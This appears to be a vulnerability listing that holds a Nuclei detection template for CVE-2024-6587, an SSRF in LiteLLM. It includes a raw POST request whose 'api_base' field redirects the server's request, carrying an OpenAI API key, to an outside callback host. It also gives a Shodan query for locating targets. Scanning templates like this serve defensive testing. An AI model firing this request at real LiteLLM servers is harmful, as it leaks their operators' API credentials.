漏洞描述
LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys.
CVE-2024-6587: LiteLLM - Server-Side Request Forgery
PoC代码[已公开]
id: CVE-2024-6587
info:
name: LiteLLM - Server-Side Request Forgery
author: pdresearch,iamnoooob,rootxharsh,lambdasawa
severity: high
description: |
LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys.
impact: |
Attackers can exploit SSRF to send requests to arbitrary URLs with OpenAI API keys in the Authorization header, potentially exposing API credentials.
remediation: |
Update LiteLLM to the latest version that addresses the SSRF vulnerability in the chat/completions endpoint.
reference:
- https://huntr.com/bounties/4001e1a2-7b7a-4776-a3ae-e6692ec3d997
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6587
classification:
epss-score: 0.87671
epss-percentile: 0.99444
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:439373620
tags: cve,cve2024,ssrf,openai,litellm,vkev,vuln
http:
- raw:
- |
POST /chat/completions HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"model": "command-nightly",
"messages": [
{
"content": "Hello, how are you?",
"role": "user"
}
],
"api_base": "https://{{interactsh-url}}"
}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "Bearer"
# digest: 4a0a0047304502206e7a6e78afbc82ab0a4b16bf395e7af624cc1e55f9eb70dd5c0fd30a8af569c6022100cb6a3aa20bcad11e3ce0c25db11ee10fc7cc4a16ab4837e38e1dbbfd6dfe9242:922c64590222798bb761d5b6d8e72950